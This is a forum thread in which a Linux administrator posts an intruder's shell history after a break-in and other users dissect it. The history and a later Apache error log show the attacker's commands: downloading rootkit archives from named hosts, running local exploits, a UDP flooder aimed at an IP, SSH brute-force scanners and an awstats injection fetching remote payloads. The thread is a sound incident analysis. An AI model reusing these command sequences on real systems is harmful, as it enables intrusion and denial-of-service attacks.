Caught somebody rootkiting me today

[fergusoa]

This morning, somebody rootkited a machine I thought was reasonably secure (up-to-date ssh and apache, all other services blocked by shorewall). I discovered the intrusion before they had a chance to delete their .bash_history.

I'll be rebuilding the system (and another one they gained access to), but I'm sorta cuious as to what they were up to, and I'm wondering if their history points to any glaring vaulnerabilities that I should be aware of.

Any insight would be greatly appriciated!

Code: Select all

w
wget 
cd /tmp
ls -a
uname -a
id
wget ps -x
ps -x
ps -awx
wget www.gas.as.ro/root
rm -rf 404-redirect.html
wget www.grutza.as.ro/root.tar.gz
tar zxvf root.tar.gz
cd root
ls -a
mv root.tar.gz /home
cd 
ls -a
cd /mtp
cd /tmp
mv root.tar.gz /guest
passwd
w
w
cd 
ls -a
wget www.grutza.as.ro/root.tar.gz
tar zxvf root.tar.gz
cd root
./hator
./memo
w
ls -al
./ptrace
w
ls -a
cd
cd root
./pt
./s
cd 
rm -rf root root.tar.gz
cd /tmp
rm -rf root.tar.gz
wget www.grutza.as.ro/vadimII.tgz
tar zxvf vadimII.tgz
./vadimII
./vadimII 208.38.154.110 53
./vadimII 208.38.154.110 53 0
w
ps -x
cd ..
cd /tm,p
cd /tmp
ls -a
rm -rf vadimII vadimII.tgz
wget socks.idilis.ro/flood.tgz
rm -rf blockpage.cgi?ws-session=100716957
wget http://www.funet.fi/pub/crypt/cryptography/pgp-local/old/stealth.tar.gz
tar zxvf stealth.tar.gz
./stealth
cd stealth.c
./stealth.c
make
./stealth
./stealth
ls -al
./stealth 208.38.154.110 53
w
rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth
wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf
vi psybnc.conf
./psybnc
kill -9 6239
vi psybnc.conf
./psybnc
w
netstat -a
ls -a
ps -x
kill -9 6242
w
whois JustBodo.org
w
w
hostaname a
w
w
exit
w
uname -a
cd /tmp
wget www.kriminal.as.ro/bot.tar.gz
tar zxvf bot.tar.gz
cd bot
ls -a
pico mech.set
vi mech.set
vi bbb.usr
./initg
ps -x
kill -9 6408
kill -9 6411 6414
ls -a
cd 
ls -a
cd /tmp
ls -a
rm -rf bot 
rm -rf bot.tar.gz
wget www.grutza.as.ro/mech.tgz
tar zxvf mech.tgz
cd mech
ls -a
pico mech.set
vi mech.set
ls -a
vi ftpusers- 
./mech
ps -x
kill -9 6454 6452
w
ps -x
uname -a
id
w
cd /tmp
ls -al
cd mech
ls -al
less ftpusers- 
less mech.set 
pico ftpusers- 
vi ftpusers- 
vi mech.set 
vi mech.set 
mv mech bash-
./bash- 
./bash- 
./bash- 
passwd
exit
exit
w
ps -awx
w
w
wget 
wget www.grutza.as.ro/stealth
w
w
w
w
w
cd /tmp
l s-a
ftp www.icekid.dap.ro
w
wget wget www.icekid.dap.ro/gas.tar.gz
wget 80.96.205.14/gas.tar.gz
w
w
w
w
exit
a
ls -al
useradd
cd ..
wget www.geocities.com/catalinum/xnet.tar.gz
tar xzvf xnet.tar.gz 
w
uname 0a
uname -a
cd /tmp
ps -x
ls -al
cd .ssh
mkdir .ssh
cd .ssh
wget www.gas.as.ro/root.tar.gz
tar xzvf root.tar.gz 
cd root
./hator 
./memo 
./s
./km3 
ls
./pt
./ptrace 
./e
cd /tmp/.ssh
cd ssh/
mv r00t muie
./muie 212.200 -d 4
cd /tmp
cd .ssh/
cd ssh/
ls -al
./muie 215.125
./muie 215.125 -d 4
./muie 215 -d 4
./muie 212 -d 4
cd /tmp.ssh
cd /tmp..ssh
cd /tmp/.ssh
wget www.geocities.com/dorofteig/em.tar.gz
tar xzvf em.tar.gz 
cdem
cd em
cd emech/
pico emech.users 
vi emech.users 
cat mech.session 
ls
vi mech.session 
./httpd 
./httpd 
exit
cd /tmp
cd .ssh
ls -a
ps -x
kill -9 26396 
kill -9 26398
kill -9 4618
kill -9 4626
cd emech/
ls -a
pico emech.users 
vi emech.users 
./httpd 
./httpd 
./httpd 
cd ..
cd ssh
ls -a
cd ..
wget scanners.go.ro/wow.tgz
wget scanners.go.ro/wow.tgz
./brute
cd ssh/
./brute 
./muie 64.51 -d 4
cd /tmp/ssh
cd /tmp/.ssh
ftp ftp2.megaftpservers.com
ftp ftp2.megaftpservers.com
ls -a
mkdir wow
mv go.sh wow
cd wow
ls -a
cd ..
mv assh wow
mv pscan2  wow
mv ss eoe
mv ss wow
mv assh wow
cd wow
ls
cd ..
mv auto wow
ls -a
mc sshf wow
mv sshf wow
cd wow
ls -a
chmod +_x*
chmod +x *
ls -a
./assh 128.38
./assh 67.121
cd /tmp/.ssh
ls -a
ftp ftp2.megaftpservers.com
w
cd /tmp
cd .ssh
ls -a
rm -rf ssh xnet.tar.gz 
ftp ftp2.megaftpservers.com
cd /tmp
cd " "
ftp ftp2.megaftpservers.com
ls -a
chmod +x 8
chmod +x *
ls -a
wget www.xeofreestyle.com/2000/hybrid.swf
wget www.xeofreestyle.com/2000/hybrid.swf
wget www.xeofreestyle.com/2000/hybrid.swf
ls -a
rm -rf hyb*
ls -a
./assh 212.16
w
id
cat /etc/issue
cd /tmp
ls -a
cd " "
mkdir " "
cd " "
wget
wget lamisto.ws/wow.tgz
ls -a
rm -rf wow.tgz 
rm -rf wow.tar.gz 
wget lamisto.ws/wow.tar.gz
rm -rf wow.tar.gz 
ftp lamisto.ws
ftp ftp.lamisto.ws
ftp ftp2.megaftpservers.com
passwd
cd /tmp
w
who
cd " "
ls -a
./assh 212.16
ls -a
ftp ftp2.megaftpservers.com
cd /tmp
cd " "
ftp ftp.megaftpservers.com
ftp ftp2.megaftpservers.com
ls -a
chmod +x *
./sshf
./assh 212.16
ls -a
./assh 212.17
./assh 216.0
cd /tmp
mkdir " "
cd " "
ls -a
mkdir php
cd php
wget unixshellz.org/sanders/php.tgz
tar xzvf php.tgz 
ftp 212.16.54.197
cd /tmp
ls -a
cd " "
ls -a
cd php
ls -a
ftp sv1.33747.ip.nltree.nl
ftp 63.247.76.5

[/code]

[Petyr]

The history basically to me appears to be everything they did after they'd already gained root access. Everything that I read in there (err... skimmed really but yea) points to them getting utils to cover their tracks and whatnot.

You're lucky you caught the bastard in the act. At least you know what he was attempting to do, but as for HOW he did it, that's the mystery. Check out your apache log files and all the other log files (please tell me you didn't format the box yet...)

anyhow, hope you figure out how they did it. I'd be interested to know at least.

hth,
Petyr

[hanj]

I think you need to look for stuff in apache's access_log and error_log, also your ftp logs. Guessing that he didn't remove history, there is a good chance the useful entries are in there somewhere.

Also, anything left in /tmp?
What's your kernel version?
What were your SSH settings (/etc/ssh/sshd_config)?
There has been a rash of SSH brute force attempts. Did you allow root access from SSH?
Anything fo
Are all user's passwords 'strong'?
Anything in /var/log/auth.log or /var/log/messages?

You may be able to get a time stamp from running last and then grep on logs. Also, for foresnic purposes... did you install chkrootkit and rkhunter to figure out possible vulnerabilites.. and to see what his root kit(s) have done.

Here is some info on some of the packages he installed.. .

vadimII
FROM: http://www.linuxquestions.org/questions ... 01/2/40902

Finally, about Vadim. From source code of predecessors vadim and vadimI we see vadimII is named after romanian politician called Corneliu Vadim Tudor. If sniffed on the wire a clue for marking payloads in the source: #define Vadim_STRING "0123456789" which does send(s, Vadim_STRING, Vadim_SIZE, 0); later on. Running strings on the binary reveals text "Vadim v.II[beta release] by Luciffer".
Like sl2, sl3 or slice they are DoS flooders. If unpacked from default archives it'll usually be in the vincinity of more flooders, IRC bouncers, (broadcast address) scanners. If hidden with a LKM like Adore dirs and processes will not show up on reboot.


stealth.c
FROM: http://www.packetstormsecurity.org/linux/modules/
Stealth.c is a Linux 2.2.x kernel module which discards packets that many OS detection tools use to query the TCP/IP stack. Includes logging of the dropped query packets and packets with bogus flags.

psyBNC2.3.1.tar.gz
FROM: http://www.voodoohosting.com/files/psyBNC_Install.txt
Before going through these options, do the following: know the IP of your shell. for example, if you connect to 'your.shell.com', go into mirc and type '/dns your.shell.com' to get the numeric IP. Also, choose a port for the bnc. We recommend some random number that no one will guess. Ok, on to the options:

Listening ports - You have to tell the bnc where to listen. You can have it listen on more than one port on the same IP, on multiple IPs with the same port, etc. For most people, listening on just one port on one IP is adequate. (the psybnc default is 31337)

hanji

[zerojay]

I would e-mail the servers that the downloaded files were stored on. There's a good chance that they were compromised as well.

[justanothergentoofanatic]

Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.

-Mike

[zerojay]

Did you find out how they rooted you? I'm curious because I also run Apache in its default configuration.

-Mike

php and phpBB exploits seem to be rather popular these days.

[rshadow]

I would be interested in not only how you were rooted.. but how did you detect that you were rooted?

[fleed]

One more request for how they rooted you! I just want to make sure I don't have any vulnerabilities that might lead to the same happening to me.

[codemaker]

php and phpBB exploits seem to be rather popular these days.

I heard about phpBB exploits but nothing about php. What exploits are you talking about? Couldn't find any on bugtraq...

[rex123]

Is it certain that the attacker had root access? Whose .bash_history is that? If it's root, then how come fergusoa can still access after they've changed the password? Also if they got root, why are they putting all their files in a world-writable directory (ie /tmp)? Also, look how lame they are. Look at the bit where they download a program called "stealth", try to cd to a file, try to run some source code, then realise that the program doesn't do what they are trying to do and delete it all.

I don't know, but it's very possible that they didn't get root access, and the attempted exploits all failed (which is what you would hope, running a vaguely up-to-date Gentoo).

The attack looks extremely similar to one I've seen on a server I manage.

We ended up with a script called assh, which uses pscan2 to find machines running ssh, then tries to brute-force them (but not very hard). We also had a version of emech running and connecting to undernet IRC. No real harm was done, and they only had access for a couple of hours.

If you have a feeble password (eg "password", or the same as your username, which was our case) someone will notice, and later use that password to log on. But they don't have root access unless one of their exploits works. In our case they appeared to try to run an exploit that only works for <2.4.10 kernels, so it was no use at all. They also opened a bindshell backdoor that was useless because the port was closed at the firewall.

It's easy to assume the worst, and safest to remove the machine from the network altogether, but I don't think that just because someone has a file called "root" one should assume that the intruder had root access.

[fergusoa]

I'm fairly certian they gained access through a weak password --- we imported the passwd/shadow defintions from another host, which contained the username/password pair guest/guest! I cannot be sure that they obtained root access, but we've rebuilt the systems regardless.

To answer rshadow's question, the intrusion was spotted in the logs. I noticed that user 'guest' had logged on, and it didn't make any sense.

I've learned my lesson, and I'll be a whole more draconian about userspace/password issues in the future! I work with a reseach group comprised of engineers with non-cs backgrounds, and we've been slowly learning the do's and don'ts of linux administration --- sometimes the hard way.

Thanks again for all the helpful comments!

[Petyr]

Be happy you work with Engineers rather than Scientests!
<grin>

Petyr
who has had the pleasure of working with scientests for almost 4 years running now...

[Mugen096]

Just curious, but through all of this, am assuming the the most basic of security steps was taken, that is to not allow the direct login of root through SSH and to also only allow root to be su'd through only a select few individuals?

Dan

[someguy]

"There has been a rash of SSH brute force attempts. Did you allow root access from SSH? "
i got rooted and my forum got fubared
it wasnt ssh but i think they may have sniffed on mine somehow i didnt really notice it till my daemons started failing
i have some of what was left in /tmp it was udp.pl i think the guy was trying to use my machine for a ddos system i give the guy serious respect tho it has been the only time anything of mine has gotten hacked in almost 10 years the guy cleaned after himself there was some entries in /proc
that i cant figure out how tho im about to check auth.log and i also got his initials in my apache log later on .... still got it heh

[mattman206]

I can't help but chuckle at the attacker's lack of Linux skills.

Example:

wget www.gas.as.ro/root
rm -rf 404-redirect.html
wget www.grutza.as.ro/root.tar.gz

If you were really all about trying to get root.tar.gz downloaded, you would have just typed it the first time.

cd /mtp
cd /tmp

Guess they can't type either!

wget www.grutza.as.ro/root.tar.gz

Wait a sec, they already downloaded this once -- why download it again?

wget socks.idilis.ro/flood.tgz
rm -rf blockpage.cgi?ws-session=100716957

Whoops, the file isn't there. Why didn't they check that the file was really there on their local computer before trying to download it on a compromised system and leave tracks?

tar zxvf stealth.tar.gz
./stealth
cd stealth.c
./stealth.c
make

Hmmm, let's try to run a non-existant program, then change directories to a file, then try to run a C file! Oh yeah...what was that program you use to compile a file.......mark, muck, oh! make!

./stealth
./stealth 208.38.154.110 53
rm -rf stealth.tar.gz stealth.o stealth.manual stealth.c stealth

Hmm, guess it needs more command-line arguments. Welp, guess it goesn't work, screw it.

wget lam3rz.de/psyBNC2.3.1.tar.gz; tar zxvf psyBNC2.3.1.tar.gz; rm -rf psyBNC2.3.1.tar.gz; cd psybnc; make; pico psybnc.conf

Oh my goodness, I can't believe that they strung multiple commands together with semi-colons! Now that's getting fancy. Probably just cutting/pasting from someplace.

psybnc.conf
vi psybnc.conf

Yes, let's try to run a configuration file. Oh wait, I have to edit it.

etc. etc. etc.

I can't imagine this attack was anything other than some script kiddie playing around. If you google for some of the commands they typed in, especially the longer ones, you can find pages with step-by-step instructions for doing these kinds of things.

One in partitular, containing the psyBNC attempt, has been taken down but is still in the google cache. Unfortunatley I don't know Spanish.
http://www.google.com/search?q=cache:fL ... onf+&hl=en

Try googling for some of the other commands the attacker used -- maybe they'll turn up some more interesting clues.

HTH,
Matt

[alxcm]

I do understand Spanish.

On a cursory glance, that page is just instructions for setting up psyBNC and doesn't contain anything referencing hacking/rooting. It definitely isn't written for a n00b, since (this is a little strange to) it recommends adding a user by editing /etc/passwd and /etc/group.

If you want me to look it over in a little more detail, just ask

-Alex

[Slynix]

Someone got vadimII onto my computer over apache :/

[drspewfy]

all this stuff was made from a script kiddie.. he just want HIs bot and your IP to Hide in the IRc..

the psybnc works for ip spoofing.

the emech program.. is just for put a BOt in his irc channel..
he looks that he wotn Hert you.. cuz he just wants the bot, and spoof his ip...
they are really n00bs, and they dont know almost anything about UNIX..

they just know about Rootkits, basic unix command to run his programs.. and that it!.. they are kids around 13-16 yeah old... they just now.. the FAmous ... "./program"

when i was a child.. i did that kind of stuff.. that was 5 o 6 years ago.. now im 20.

JUST FORMAT YOUR SYSTEM... and more often upgrade your system..

BUT-..... IM CURIOUS.. CHECK ALL YOUR Logs. how did he ROOTED your box ????

set up SNORT, tripwire, snort_inline; also read step by step the security handbook of gentoo.org/doc .. and apply it on your server... ,




Seeya from mexico

[jonaswidarsson]

hello.
I had vadimII today. Nothing feels like a cpu load of 100.0 caused by some cracker. You should try it some time...

Anyways, here is a strange log i grepped out of apache's error_log.
It seems the hole is in awstats.

Code: Select all

ns tmp # tail /var/log/apache2/error_log -n 500 | grep 203.162.3.145
[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats
[Mon Oct 03 23:09:34 2005] [error] [client 203.162.3.145] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl
[Mon Oct 03 23:09:35 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cgi
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] --23:09:38--  http://www.coiuldefier.com/tback8080
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]            => `tback8080'
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] Resolving www.coiuldefier.com...
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] failed: Host not found.
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] chmod:
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] cannot access `tback8080'
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] : No such file or directory
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: ./tback8080: No such file or directory
[Mon Oct 03 23:09:38 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/stat-cgi
[Mon Oct 03 23:09:39 2005] [error] [client 203.162.3.145] script not found or unable to stat: /usr/share/webapps/awstats/6.1/hostroot/cgi-bin/perl
[Mon Oct 03 23:09:40 2005] [error] [client 203.162.3.145] File does not exist: /var/www/widarsson/cp
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] --23:09:56--  http://www.ralphy.as.ro/quake
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]            => `quake'
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Resolving www.ralphy.as.ro...
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 193.230.153.133
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Connecting to www.ralphy.as.ro[193.230.153.133]:80...
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] connected.
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] HTTP request sent, awaiting response...
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 200 OK
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] Length: 18,204 [text/plain]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]     0K .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] . .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] ..
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] .                                    100%  102.41 KB/s
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145] 23:09:56 (102.41 KB/s) - `quake' saved [18204/18204]
[Mon Oct 03 23:09:56 2005] [error] [client 203.162.3.145]
[Mon Oct 03 23:09:57 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:10:06 2005] [error] [client 203.162.3.145] sh: line 1: fg: no job control
[Mon Oct 03 23:14:57 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed
[Mon Oct 03 23:15:06 2005] [error] [client 203.162.3.145] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed

And it was probably because of this:
http://www.gentoo.org/security/en/glsa/ ... 501-36.xml

[Gotterdammerung]

Man, that's something that would really take my sweet dreams away.

[Matteo Azzali]

JUST FORMAT YOUR SYSTEM... and more often upgrade your system..

BUT-..... IM CURIOUS.. CHECK ALL YOUR Logs. how did he ROOTED your box ????

set up SNORT, tripwire, snort_inline; also read step by step the security handbook of gentoo.org/doc .. and apply it on your server... ,
Seeya from mexico

I want some explaination on these irc bots:
Am I secured if irc ports are closed on my firewall?
Is there any other way to get rid of them that's not formatting???
(malware scanner/remover....)
Does an app-centric firewall (checking both the complete executable path and
the checksum of the executable that generated/want to receive the packets) could protect me better?